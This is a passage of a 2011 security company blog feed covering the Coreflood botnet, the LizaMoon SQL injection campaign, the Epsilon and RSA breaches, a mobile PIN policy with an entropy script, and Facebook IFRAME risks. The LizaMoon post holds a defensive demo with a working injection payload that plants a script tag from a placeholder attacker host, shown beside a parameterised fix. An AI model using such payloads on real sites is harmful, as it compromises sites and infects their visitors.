<p>Although the FBI has taken ownership of the command and control servers and is issuing shutdown commands to the active bots, the malware is still installed on the compromised machines and reactivates at boot. Analysis of this Coreflood variant indicates that the C&amp;C domains change monthly and have been pre-registered in countries outside United States jurisdiction, so there remains a possibility of the criminal ring regaining control of the botnet. Perimeter strongly recommends that customers take the following actions to stay protected:</p>
<ul>
<li>Use Web Content Filtering (WCF) to lock down Internet usage by enforcing user authentication and blocking categories not critical to the business</li>
<li>In particular, customers are strongly advised to block access to unclassified (uncategorized) sites, which commonly harbor malware and C&amp;C servers</li>
<li>Use standard best practices such as network IPS and network/desktop AV to help prevent infections</li>
<li>In cases where infections do occur, a strong WCF policy will help prevent theft of data, and will provide additional logging information used by Perimeter&#8217;s Security Operations Center</li>
</ul>
<p>Thanks for your time and attention, and stay safe.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/fbi-takes-down-coreflood-botnet-but-many-companies-remain-vulnerable/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What You Need to Know About the Liza Moon SQL Injection Exploit</title>
		<link>http://perimeterusa.com/blog/what-you-need-to-know-about-the-liza-moon-sql-injection-exploit/</link>
		<comments>http://perimeterusa.com/blog/what-you-need-to-know-about-the-liza-moon-sql-injection-exploit/#comments</comments>
		<pubDate>Tue, 05 Apr 2011 13:11:27 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1207</guid>
		<description><![CDATA[By Evan Keiser, Security Analyst, Perimeter E-Security Over the past week a massive ongoing SQL injection campaign has compromised more than 1.5 million sites according to a BBC report and other outlets. Our friends at Websense broke the news first. Dancho Danchev has a nice writeup too. The Perimeter Security Operations Center has been watching this massive attack [...]]]></description>
			<content:encoded><![CDATA[<p><em>By Evan Keiser, Security Analyst, Perimeter E-Security</em></p>
<p>Over the past week a massive ongoing SQL injection campaign has <a href="http://www.bbc.co.uk/news/technology-12933053">compromised more than 1.5 million sites</a> according to a BBC report and <a href="http://www.itworld.com/security/142308/websense-massive-cyber-attack-hits-15-million-sites?source=itw_rss">other</a> outlets. Our friends at Websense <a href="http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx">broke the news first</a>. Dancho Danchev has a <a href="http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html">nice writeup too</a>.</p>
<p>The Perimeter Security Operations Center has been watching this massive attack spread quickly throughout the web. We have seen smaller campaigns with very similar attacks since September 2010, but nothing of this magnitude. So far, what we have been able to gather:</p>
<ul>
<li>the attack performs an SQL injection against a currently unidentified web application. Note that this does not mean SQL Server or other database products are themselves vulnerable; the flaw is in the application that builds the queries</li>
<li>after the SQL injection succeeds, the attack injects a malicious script, served from an obfuscated .php file, into the website</li>
<li>the malicious .php file redirects a visitor through compromised URLs to a fake anti-virus download site. The redirections are visible to the user, because the pages show a fake antivirus scan</li>
<li>as with any fake AV malware, the scan is of course fake, and is followed by the standard prompt to download a malicious file made to look like a legitimate installer</li>
</ul>
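<p>To make the first two bullets concrete, here is an added example (constructed for this post; not LizaMoon&#8217;s actual code and not the Perimeter SOC&#8217;s) that runs a mass-injection style payload against a string-concatenated query and against the parameterised version of the same query, using an in-memory SQLite table as the site&#8217;s content store. The payload shape, table name and placeholder URL are assumptions, and SQLite&#8217;s executescript() stands in for a database driver that accepts stacked statements.</p>

```python
import sqlite3

# Constructed payload in the shape of a mass-injection attack: close the string,
# append a script tag to every row of a text column, comment out the remainder.
# The URL is a placeholder, not the campaign's real domain.
PAYLOAD = (
    "x'; UPDATE articles SET body = body || "
    "'<script src=\"http://malicious.example/ur.php\"></script>'; --"
)


def setup_db():
    """In-memory table standing in for a site's content database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello world"), ("News", "Quarterly results")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Vulnerable form: user input pasted straight into the statement.

    executescript() models a driver that accepts stacked statements, which is
    what lets the attacker's UPDATE ride along behind the application's SELECT.
    The SELECT's rows do not matter; the side effect on the table is the point.
    """
    sql = "SELECT id FROM articles WHERE title = '%s';" % term
    conn.executescript(sql)


def search_hardened(conn, term):
    """Hardened form: a parameterised query. The payload is just a non-matching title."""
    return conn.execute("SELECT id FROM articles WHERE title = ?", (term,)).fetchall()


def injected_rows(conn):
    """Triage query a site owner can run: which rows now carry a script tag?"""
    return conn.execute(
        "SELECT id, title FROM articles WHERE body LIKE '%<script%'"
    ).fetchall()


def run_demo():
    """Run the same payload through both code paths and report the damage."""
    results = {}
    vuln = setup_db()
    search_vulnerable(vuln, PAYLOAD)
    results["vulnerable_tainted"] = len(injected_rows(vuln))

    safe = setup_db()
    results["hardened_matches"] = len(search_hardened(safe, PAYLOAD))
    results["hardened_tainted"] = len(injected_rows(safe))
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

<p>The database engine is not at fault in either path; the only difference is whether the application lets the attacker&#8217;s text become part of the statement. The LIKE query at the end is the quick way to scope an incident once a site is suspected of being hit.</p>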
<p>The Perimeter Security Operations Center has been following this campaign. We are keeping track of new domains as they become known to us, and we have also employed several detection methods based on the hostnames, IP addresses, common strings and executable sizes related to the malicious activity, as well as the malware payload it attempts to deliver. We have recently been alerted that the malicious code injections have begun to find their way onto Twitter; luckily, the malicious code in the tweets is currently inactive, so Twitter users should be safe at the moment.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/what-you-need-to-know-about-the-liza-moon-sql-injection-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Epsilon Mailing List Hack: Nothing to See Here, Move Along</title>
		<link>http://perimeterusa.com/blog/the-epsilon-mailing-list-hack-nothing-to-see-here-move-along/</link>
		<comments>http://perimeterusa.com/blog/the-epsilon-mailing-list-hack-nothing-to-see-here-move-along/#comments</comments>
		<pubDate>Tue, 05 Apr 2011 12:52:58 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Banking Information Security]]></category>
		<category><![CDATA[Data Breach]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[secure messaging]]></category>
		<category><![CDATA[Security Breach]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1200</guid>
		<description><![CDATA[Late last week, e-mail services firm Epsilon, which manages e-mail campaigns for hundreds of high-profile clients in retail, publishing, consulting and other sectors, revealed that it had been hacked. This is embarrassing for Epsilon, but the attack will be of no consequence to most people. Take this incident as an opportunity to reinforce your security policies. But don't worry too much. Compared to the RSA compromise from a few weeks ago, this is very small beer.]]></description>
			<content:encoded><![CDATA[<p><em>by Andrew Jaquith, Chief Technology Officer, Perimeter E-Security</em></p>
<p>Late last week, e-mail services firm Epsilon, which manages e-mail campaigns for hundreds of high-profile clients in retail, publishing, consulting and other sectors, <a href="http://www.businessweek.com/news/2011-04-04/marriott-hilton-hit-by-breach-to-client-e-mail-information.html">revealed that it had been hacked</a>. As a consequence, the attackers were able to obtain the names and e-mail addresses of millions of customers of companies like Citigroup, Walgreens, JP Morgan and many, many others.</p>
<p>Like me, you likely received a notice from a company you do business with informing you of the hack. I got mine from <a href="http://www.mckinseyquarterly.com">McKinsey Quarterly</a>:</p>
<blockquote>
<p style="padding-left: 30px">We have been informed by our e-mail service provider, Epsilon, that your e-mail address was exposed by unauthorized entry into their system. Epsilon sends e-mails on our behalf to McKinsey Quarterly users who have opted to receive e-mail communications from us.</p>
<p style="padding-left: 30px">We have been assured by Epsilon that the only information that was obtained was your first name, last name and e-mail address and that the files that were accessed did not include any other information. We are actively working to confirm this. We do not store any credit card numbers, social security numbers, or other personally identifiable information of our users, so we can assure you that no such information was accessed.</p>
<p style="padding-left: 30px">Please note, it is possible you may receive spam e-mail messages as a result. We want to urge you to be cautious when opening links or attachments from unknown third parties. Also know that McKinsey Quarterly will not send you e-mails asking for your credit card number, social security number or other personally identifiable information. So if you are ever asked for this information, you can be confident it is not from McKinsey.</p>
<p style="padding-left: 30px">We regret this has taken place and apologize for any inconvenience this may have caused you. We take your privacy very seriously, and we will continue to work diligently to protect your personal information.</p>
</blockquote>
<p>Three quick observations about What It Means:</p>
<p><strong>First, this is embarrassing for Epsilon</strong>. It suggests that they have some work to do on their defenses. We don&#8217;t know how the attackers got in &#8212; it could have been by exploiting a weakness in their web applications (likely), or from a social engineering attack of the type that hosed RSA (less likely).</p>
<p><strong>Second, the attack will be of no consequence to most people</strong>. Yes, <a href="http://www.secure-value.com/douglasdavidson/2011/04/aftermath-of-epsilon-hack-more-fud-on-horizon-third-party-verification-gets-boost-confirm-you-have-s.html">as many commentators have written</a>, there is an &#8220;elevated risk of spear phishing attacks,&#8221; which in plain English means this: because the bad guys have your name and e-mail address, they might try to trick you by sending you an e-mail with a funny link. But to be honest, I don&#8217;t get much, if any, spam &#8212; thanks to Perimeter&#8217;s multi-stage e-mail filtering service. And if you use a premium spam filtering service, you probably don&#8217;t either. And even if the attackers manage to put together an e-mail that does get through your spam filters, how would you be able to tell that this particular break-in was the cause of it? Right.</p>
<p><strong>Third, </strong><em><strong>nice work McKinsey</strong></em><strong>!</strong> The e-mail above is a great example of how to write an unambiguous and clear disclosure e-mail. You&#8217;ll note that they spell out exactly what Epsilon says has been disclosed (name and e-mail address, not enough to trigger a PCI or HIPAA violation). They also provide appropriate guidance on what to watch out for, and reinforce that McKinsey employees will never request sensitive information from their customers (which they shouldn&#8217;t). This is exactly what you should say in an e-mail like this.</p>
<p>The bottom line is this: spam happens. Just make sure that your employees and colleagues don&#8217;t blindly click on attachments they shouldn&#8217;t, or blindly click on links embedded in e-mail. Take this incident as an opportunity to reinforce your security policies. But don&#8217;t worry too much. Compared to the RSA compromise from a few weeks ago, this is very small beer.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/the-epsilon-mailing-list-hack-nothing-to-see-here-move-along/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>RSA warns SecurID customers after company is hacked</title>
		<link>http://perimeterusa.com/blog/rsa-warns-securid-customers-after-company-is-hacked/</link>
		<comments>http://perimeterusa.com/blog/rsa-warns-securid-customers-after-company-is-hacked/#comments</comments>
		<pubDate>Mon, 21 Mar 2011 13:51:47 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Data Breach]]></category>
		<category><![CDATA[Enterprise IT]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[Security Breach]]></category>
		<category><![CDATA[security monitoring]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1193</guid>
		<description><![CDATA[Attention Perimeter Customers: As you may be aware, RSA, The Security Division of EMC, disclosed yesterday that an unknown outside party successfully compromised RSA's security systems. These attackers are believed to have stolen information related to the operation of RSA SecurID tokens. ]]></description>
			<content:encoded><![CDATA[<p>Attention Perimeter Customers: As you may be aware, RSA, The Security Division of EMC, disclosed yesterday that an unknown outside party successfully compromised RSA&#8217;s security systems. These attackers are believed to have stolen information related to the operation of RSA SecurID tokens. The identity, motivation and goals of the attackers are unknown. The exact methods they used to compromise RSA&#8217;s systems (malware, social engineering, or server exploit) are unknown.</p>
<p>It is not clear whether the theft of this information enables attackers to compromise customers&#8217; own SecurID deployments. RSA claims that the information obtained by the attackers does not. As described in RSA&#8217;s advisory (<a href="http://www.rsa.com/node.aspx?id=3872">http://www.rsa.com/node.aspx?id=3872</a>):</p>
<p>&#8220;[RSA has] no evidence that customer security related to other RSA products has been similarly impacted. We are also confident that no other EMC products were impacted by this attack. It is important to note that we do not believe that either customer or employee personally identifiable information was compromised as a result of this incident.&#8221;</p>
<p>However, RSA&#8217;s news release also notes that &#8220;[while] the information extracted does not enable a successful direct attack on any of our RSA SecurID customers, this information could potentially be used to reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack.&#8221;</p>
<p>We strongly urge customers to read the full advisory from RSA here: <a href="http://www.sec.gov/Archives/edgar/data/790070/000119312511070159/dex992.htm">http://www.sec.gov/Archives/edgar/data/790070/000119312511070159/dex992.htm</a></p>
<p>There is no indication that suggests Perimeter’s customers are at risk. We are continuing to monitor the situation and will send out additional updates as new information is made available.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/rsa-warns-securid-customers-after-company-is-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Picking a Sensible Mobile Password Policy</title>
		<link>http://perimeterusa.com/blog/picking-a-sensible-mobile-password-policy/</link>
		<comments>http://perimeterusa.com/blog/picking-a-sensible-mobile-password-policy/#comments</comments>
		<pubDate>Thu, 17 Mar 2011 15:55:06 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[ActiveSync]]></category>
		<category><![CDATA[Apple iPad]]></category>
		<category><![CDATA[Banking Compliance]]></category>
		<category><![CDATA[Banking Information Security]]></category>
		<category><![CDATA[Data Breach]]></category>
		<category><![CDATA[FINRA]]></category>
		<category><![CDATA[iPad]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[mobile security]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1180</guid>
		<description><![CDATA[Defining an enterprise mobile device passcode policy can be surprisingly difficult. Security managers must attempt to reconcile two opposing goals. They must create a passcode policy that is strong enough to protect the data on the device if it is lost or stolen, while not annoying users with needless length or complexity. These goals are hard to reconcile because employees use their devices in places they wouldn't use a PC: in the car, during their kids' football game, and during (shall we say) otherwise unproductive periods of the day. It's tempting to simply duplicate existing network security policies, but that is the wrong attitude. In this post, I'm going to describe a policy that complies with NIST's e-authentication Level 1 standard as described in Special Publication 800-63, "Electronic Authentication Guidelines." To cut to the chase: use an 8-digit numeric PIN that allows 8 incorrect guesses before permanently locking, can be idle a maximum of 15 minutes before locking, and allows a 2-minute inactivity grace period before requiring a passcode. For details, read on. Warning: a tiny bit of binary math lies ahead.]]></description>
			<content:encoded><![CDATA[<p><em>By Andrew Jaquith, Chief Technology Officer, Perimeter E-Security</em></p>
<p>Defining an enterprise mobile device passcode policy can be surprisingly difficult. Security managers must attempt to reconcile two opposing goals. They must:</p>
<ul>
<li>Create a passcode policy that is strong enough to protect the device if it is lost or stolen, while:</li>
<li>Not annoying users with needless length or complexity</li>
</ul>
<p>These goals are hard to reconcile because mobile devices like smartphones and tablets are personal, portable and convenient. Employees use their devices in places they wouldn’t use a PC: in the car, during their kids’ football game, and during (shall we say) otherwise unproductive periods of the day. It’s tempting to simply duplicate existing network security policies. The rationale goes something like this: smartphones and tablets are nothing more than small PCs with antennas, so the password policies should be the same as for PCs. It’s easy to think that, but it’s the wrong attitude.</p>
<p>The whitepaper linked below describes the passcode policy I recommend for mobile devices; it complies with NIST’s e-authentication Level 1 guidelines as described in <a href="http://csrc.nist.gov/publications/nistpubs/800-63/SP800-63V1_0_2.pdf">Special Publication 800-63, “Electronic Authentication Guidelines”</a>. The policy is reasonable, employee-friendly and highly usable, but strong enough to protect your company’s data. To cut to the chase, here’s what it is:</p>
<ul>
<li>8-digit numeric PIN</li>
<li>Simple PINs disallowed</li>
<li>Automatic lock after 15 minutes</li>
<li>Grace period of 2 minutes</li>
<li>Automatic wipe/permanent lock after eight wrong tries</li>
<li>No expiration</li>
</ul>
<p><a href="http://www.perimeterusa.com/knowledge-center/whitepapers#191">Click here</a> to read the whitepaper.</p>
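<p>The binary math behind the policy, as an added example that is not taken from the whitepaper: NIST SP 800-63 v1.0.2 caps the probability that an online guessing attack succeeds over the life of the secret at 2<sup>-10</sup> (1 in 1024) for Level 1 and 2<sup>-14</sup> (1 in 16384) for Level 2. With a wipe or permanent lock after N wrong tries, the attacker&#8217;s lifetime budget is N guesses, so the check is simply N divided by the number of possible PINs. The script below runs that check for a few candidate policies; the count of disallowed &#8220;simple&#8221; PINs is a parameter you supply (assumed zero here, which slightly overstates the key space).</p>

```python
import math

# NIST SP 800-63 v1.0.2 ceilings on the probability that an online guessing
# attack succeeds over the life of the secret.
LEVEL_LIMITS = {1: 2 ** -10, 2: 2 ** -14}   # 1 in 1024, 1 in 16384


def keyspace(digits, disallowed=0):
    """Number of PINs the attacker must choose from. `disallowed` is how many
    'simple' PINs (1234, 0000, ...) the device refuses; an assumed figure, since
    the exact blacklist is platform specific."""
    return 10 ** digits - disallowed


def guessing_entropy_bits(digits, disallowed=0):
    """log2 of the key space: the 'tiny bit of binary math'."""
    return math.log2(keyspace(digits, disallowed))


def guess_probability(digits, attempts, disallowed=0):
    """Chance that `attempts` distinct random guesses hit the PIN. A wipe or
    permanent lock after `attempts` failures caps the attacker at that budget."""
    return attempts / keyspace(digits, disallowed)


def meets_level(digits, attempts, level=1, disallowed=0):
    """True when the policy stays strictly under the level's ceiling."""
    return guess_probability(digits, attempts, disallowed) < LEVEL_LIMITS[level]


def max_attempts_for_level(digits, level=1, disallowed=0):
    """Largest failed-attempt budget that still satisfies the level (strict <).
    Zero means no lockout threshold can rescue a PIN of that length."""
    space = keyspace(digits, disallowed)
    n = math.floor(LEVEL_LIMITS[level] * space)
    if n / space >= LEVEL_LIMITS[level]:
        n -= 1
    return n


def policy_report(policies):
    """policies: iterable of (label, digits, attempts).
    Returns rows of (label, entropy_bits, probability, level1_ok, level2_ok)."""
    rows = []
    for label, digits, attempts in policies:
        rows.append((
            label,
            round(guessing_entropy_bits(digits), 1),
            guess_probability(digits, attempts),
            meets_level(digits, attempts, 1),
            meets_level(digits, attempts, 2),
        ))
    return rows


# Candidate policies to compare (the last one is the policy recommended above).
CANDIDATES = [
    ("4-digit PIN, 10 tries", 4, 10),
    ("4-digit PIN, 8 tries", 4, 8),
    ("6-digit PIN, 10 tries", 6, 10),
    ("8-digit PIN, 8 tries", 8, 8),
]

if __name__ == "__main__":
    for label, bits, p, l1, l2 in policy_report(CANDIDATES):
        print(f"{label:24s} {bits:5.1f} bits  p={p:.2e}  "
              f"L1={'ok' if l1 else 'FAIL'}  L2={'ok' if l2 else 'FAIL'}")
    for d in (4, 6, 8):
        print(f"{d}-digit PIN: at most {max_attempts_for_level(d, 1)} tries for Level 1, "
              f"{max_attempts_for_level(d, 2)} for Level 2")
```

<p>Worth noticing: a 4-digit PIN with a 10-try wipe comes out at exactly 1/1000, just over the Level 1 ceiling of 1/1024, while the same PIN with 8 tries squeaks under it, and no lockout threshold at all gets a 4-digit PIN to Level 2. The 8-digit, 8-try policy clears Level 2 by a wide margin, which is the headroom that lets the rest of the policy stay user-friendly.</p>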
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/picking-a-sensible-mobile-password-policy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Changes to Facebook Page APIs == New Risks for Customers</title>
		<link>http://perimeterusa.com/blog/changes-to-facebook-page-apis-new-risks-for-customers/</link>
		<comments>http://perimeterusa.com/blog/changes-to-facebook-page-apis-new-risks-for-customers/#comments</comments>
		<pubDate>Wed, 09 Mar 2011 18:18:01 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1177</guid>
		<description><![CDATA[By Evan Robert Keiser, Security Analyst, Perimeter E-Security with Andrew Jaquith, CTO, Perimeter E-Security Facebook recently announced that it has implemented changes to the way a Facebook page can be created. The primary change is that Facebook pages now allow authors to use IFRAME tags in their pages. Previously, authors used Facebook&#8217;s custom point and click creation interface. They were [...]]]></description>
			<content:encoded><![CDATA[<p><em>By Evan Robert Keiser, Security Analyst, Perimeter E-Security<br />
</em><em>with Andrew Jaquith, CTO, Perimeter E-Security</em></p>
<p><a href="http://developers.facebook.com/blog/post/462">Facebook recently announced that it has implemented changes</a> to the way a Facebook page can be created. The primary change is that Facebook pages now allow authors to use IFRAME tags in their pages. Previously, authors used Facebook&#8217;s custom point-and-click creation interface. They were also able to create custom Facebook apps that fetched external data from third parties for display on the page. That content was reasonably well protected because it was all proxied through Facebook, which kept potentially malicious Java and Flash exploits from functioning.</p>
<p>So why is this change so important to your security?</p>
<p>Simple: IFRAMEs are evil. Because IFRAME tags can now be included in Facebook apps, the proxying can be circumvented: the framed content is loaded directly from the third-party server into the user&#8217;s browser. This is very good news for malware writers and other cyber criminals, because social engineering is no longer required to convince users to navigate to a malicious website. Instead, they can enlist Facebook to help them.</p>
<p>For example, it is now possible to set up a default Facebook page, create a profile (the one you first see when you visit a user&#8217;s page) and include an app with an IFRAME that contains malicious JavaScript to redirect users to arbitrary websites without any interaction required. This technique is already being used in the wild, to forward users to malicious websites.</p>
<p>Our colleagues at <a href="http://www.trendmicroapac.com/blog/?p=463">Trend Micro</a> have informed Facebook of the security risks associated with the new feature, but have not yet received a response.</p>
<p>In the meantime, security conscious customers should consider limiting access to Facebook. Perimeter E-Security Managed Security Service (MSS) customers who use web content filtering can easily put a rule in place blocking access to Facebook URLs.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/changes-to-facebook-page-apis-new-risks-for-customers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>What Are the Three Pillars for Creating Value in Security  &#8211; Interview with Andrew Jaquith, Chief Technology Officer of Perimeter E-Security</title>
		<link>http://perimeterusa.com/blog/what-are-the-three-pillars-for-creating-value-in-security-interview-with-andrew-jaquith-chief-technology-officer-of-perimeter-e-security/</link>
		<comments>http://perimeterusa.com/blog/what-are-the-three-pillars-for-creating-value-in-security-interview-with-andrew-jaquith-chief-technology-officer-of-perimeter-e-security/#comments</comments>
		<pubDate>Fri, 04 Mar 2011 15:32:28 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[cloud computing]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[managed messaging services]]></category>
		<category><![CDATA[managed services providers]]></category>
		<category><![CDATA[mobile security]]></category>
		<category><![CDATA[secure messaging]]></category>
		<category><![CDATA[Vulnerability Assessment Tools]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1148</guid>
		<description><![CDATA[The three pillars that let organizations be secure today and participate better in the changing economy: Reduce Risk, Cut Cost, Enable New Business Opportunities (i.e. Cloud Computing and Mobility).]]></description>
			<content:encoded><![CDATA[<p>RSA Conference | February 16 &#8211; 18, 2011</p>
<p>By Tom Field, Editorial Director, Information Security Media Group</p>
<p>The three pillars that let organizations be secure today and participate better in the changing economy:</p>
<ul>
<li>Reduce Risk</li>
<li>Cut Cost</li>
<li>Enable New Business Opportunities (i.e. Cloud Computing and Mobility)</li>
</ul>
<p><a href="http://www.perimeterusa.com/blog/Andy-Interview.swf">Video: interview with Andrew Jaquith (Flash, 640x360)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/what-are-the-three-pillars-for-creating-value-in-security-interview-with-andrew-jaquith-chief-technology-officer-of-perimeter-e-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What Scott Charney Missed in His RSA Speech</title>
		<link>http://perimeterusa.com/blog/what-scott-charney-missed-in-his-rsa-speech/</link>
		<comments>http://perimeterusa.com/blog/what-scott-charney-missed-in-his-rsa-speech/#comments</comments>
		<pubDate>Fri, 18 Feb 2011 05:32:30 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Banking Information Security]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Intrusion Detection System]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[managed services providers]]></category>
		<category><![CDATA[mobile security]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1135</guid>
		<description><![CDATA[In the industry keynote delivered by Microsoft's corporate vice president of Trustworthy Computing, Scott Charney made three significant announcements. He admitted that last year's suggestion, to require ISPs to cut off serially infected machines, was not realistic. He proposed a system of "public health certificates," and argued that the Internet must attribute activities to people wherever we can. Charney, as the designated security spokesman for Microsoft, clearly understands his responsibility to set forth a vision for the industry. Microsoft's preeminent position as the world's leading software and systems vendor demands that he think big, think fast and think provocatively about The Future of Security. But let's be honest, there's a fine line between provocative and pollyanna.]]></description>
			<content:encoded><![CDATA[<p><em>By Andrew Jaquith, Chief Technology Officer, Perimeter E-Security</em></p>
<p>I&#8217;ve spent the week at the <a href="http://www.rsaconference.com/2011/usa/">RSA Conference</a>. It is a great place to meet colleagues, customers and friends. I had been a Conference Chair for the last 5 years, helping pick speakers and build panels. That was lots of fun, but this year I chose to sit out and let some other lucky soul have a chance. I did participate in the program, however. My friend Caroline Wong put on a <a href="https://cm.rsaconference.com/US11/catalog/modifySession.do?SESSION_ID=2531&amp;form=searchform&amp;ts=1298005111836">panel on security metrics</a>, and asked me to be one of the four panelists. The panel was a blast, and is worth a blog post in its own right.</p>
<p>But the subject of today&#8217;s post isn&#8217;t my panel, or metrics, but a key part of the show. It&#8217;s about a time-honored ritual at RSA: the industry keynote delivered by Microsoft&#8217;s Corporate Vice President of Trustworthy Computing, Scott Charney. In a <a href="http://www.microsoft.com/mscorp/twc/endtoendtrust/vision/internethealth.aspx">speech</a> that was covered by multiple media outlets, including <a href="http://www.itworld.com/security/137159/microsoft-has-a-change-heart-how-keep-internet-safe">IDG News Service</a>, <a href="http://www.cio.com.au/article/376968/microsoft_calls_safer_healthier_internet/">CIO</a>, and <a href="http://www.crn.com/news/security/229218696/rsa-2011-microsofts-how-to-for-healthy-pcs.htm;jsessionid=TBbOtVRPlA8NGxCoCc14HA**.ecappj01">Computer Reseller News</a>, Charney made three significant announcements. He:</p>
<ul>
<li><strong>Admitted that last year&#8217;s suggestion, to require ISPs to cut off serially infected machines, was not realistic</strong> because it imposed undue costs on ISPs. Charney argued instead that end-users must take more responsibility for the safety and security of their own machines. To that end, he&#8230;</li>
<li><strong>Proposed a system of &#8220;public health certificates&#8221;</strong> that customer client machines would present to relying parties like banks and on-line websites that needed extra assurance that their customers&#8217; machines were clean. Charney calls this &#8220;<a href="http://download.microsoft.com/download/7/F/B/7FB2F266-7914-4174-BBEF-2F5687882A93/Collective%20Defense%20-%20Applying%20Global%20Health%20Models%20to%20the%20Internet.pdf">Collective Defense</a>.&#8221; In addition, Charney&#8230;</li>
<li><strong>Argued that the Internet must attribute activities to people wherever we can</strong>. Charney argues that with threats, there is always a Who, a What and a Why. Figuring out who the Who is would go a long way to helping national governments fight the various cyber-wars, cyber-skirmishes and cyber-hair-pulling matches that have been documented so well in the press over the last few years.</li>
</ul>
<p>It seems to me that Scott, as the designated security spokesman for Microsoft, clearly understands his responsibility to set forth a vision for the industry. Microsoft&#8217;s preeminent position as the world&#8217;s leading software and systems vendor demands that he think big, think fast and think provocatively about The Future of Security. Moreover, the RSA Conference, as the preeminent industry conference devoted to information security, gives Microsoft (and Charney) the perfect platform for presenting their big, fast and provocative thinking. But let&#8217;s be honest, there&#8217;s a fine line between provocative and Pollyanna. This year, Charney donned blue-tinged gossamer wings and fluttered off into the magical land of wishful thinking.</p>
<p>Let&#8217;s start with Microsoft&#8217;s ideas about Collective Defense and &#8220;public health certificates.&#8221; If I understand <a href="http://download.microsoft.com/download/7/F/B/7FB2F266-7914-4174-BBEF-2F5687882A93/Collective%20Defense%20-%20Applying%20Global%20Health%20Models%20to%20the%20Internet.pdf">the idea</a> correctly, relying parties (such as banks) would elect to trust &#8212; or <em>selectively</em> trust, or <em>not</em> trust &#8212; devices that presented digitally-signed attestations about their health. Rather than call this Collective Defense, let&#8217;s call it NAC&#8217;s Nephew. Practically, here is what that would mean: if McAfee or Symantec AV tells your bank that you have a clean bill of health, then your bank ought to let you transfer your money to Liberia. But if you don&#8217;t, they might think twice or ask for secondary authentication.</p>
<p>If you are a technologist, especially one who drinks the Better Living Through Cryptography Kool-Aid or believes that &#8220;non-repudiation&#8221; actually refers to a real legal concept, digitally-signed health certificates sure sound like a great idea. But upon closer scrutiny, nagging questions about practicality, implementation complexity and the so-what factor make them less attractive. Dan Geer has noted that technologists need to beware whenever they catch themselves saying &#8220;&#8230;and then a miracle happened.&#8221; That&#8217;s what we have here. I could raise a dozen objections, including (1) the decreasing efficacy of endpoint anti-malware software, (2) the high likelihood of certificate forgery (an attestation is only as trustworthy as the software that produced it, and on an already-compromised machine that software is exactly what the attacker controls), (3) the lack of likely implementations for platforms that aren&#8217;t Windows, and (4) the serious doubt that banks are asking for this stuff anyway (Trusteer isn&#8217;t exactly setting the world on fire, is it?).</p>
<p>But these are just the obvious objections. Slightly more worrying is Charney&#8217;s admission that ISPs aren&#8217;t part of the solution for keeping PCs safe. By that I assume he meant: Comcast, Time Warner, Charter and Cox had a few objections to cutting off infected customers. I can imagine a conversation between the two Steve Bs (Ballmer and Burke) that went something like this:</p>
<p style="padding-left: 30px;"><em>Burke (Comcast)</em>: So, Steve, I understand that you&#8217;d like to have me start cutting off Internet subscribers when we figure out that their machines are infected.</p>
<p style="padding-left: 30px;"><em>Ballmer (Microsoft)</em>: You better believe it. We&#8217;re all-in on making our customers safer. ALL-IN!</p>
